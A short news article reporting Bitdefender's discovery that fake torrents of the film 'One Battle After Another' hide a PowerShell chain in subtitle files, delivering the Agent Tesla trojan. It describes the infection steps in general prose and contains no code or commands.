Subtitles for popular movie torrent files contain malware
Subtitle files for movies that can be downloaded via torrents have been found to contain malware that executes malicious commands.
Fake Leonardo DiCaprio Movie Torrent Drops Agent Tesla Through Layered PowerShell Chain
Fake 'One Battle After Another' torrent hides malware in subtitles
According to Bitdefender, an antivirus software developer, there has been a recent surge in malware detections from torrent files believed to be for the Leonardo DiCaprio movie ' One Battle After Another .' The movie is scheduled for release in September 2025, and users attempting to illegally download the new movie have fallen victim to the malware.
The torrent file in question contained a variety of files, including a video file, two image files, a subtitle file, and a shortcut file that acts as a launcher.
When a user launches the shortcut file, the malicious script embedded in the subtitle file is executed without permission using cmd.exe and powershell.exe. The subtitle file also contains real subtitles, but encrypted code is cleverly hidden between the subtitles.
When the first script is executed, it decrypts the code and performs several steps before executing a script called 'RealtekDriverInstall.ps1.' This script checks whether Windows Defender is enabled, attempts to install the Go programming language, and configures persistence using an existing scheduled task that compiles the RealtekAudioService. Once everything is in place, the next script is executed, allowing the attacker to remotely access the computer and steal financial or personal information, or use the device to launch further attacks.
Bitdefender reports that this malware is a Trojan called 'Agent Tesla' that functions as a memory-resident command-and-control agent.
It is believed that thousands of people were involved in the exchange of the files in question. While criminals taking advantage of interest in new movies to distribute malicious files is not new, Bitdefender noted that this case 'stands out for its unusually complex and stealthy infection chain.'
Related Posts:
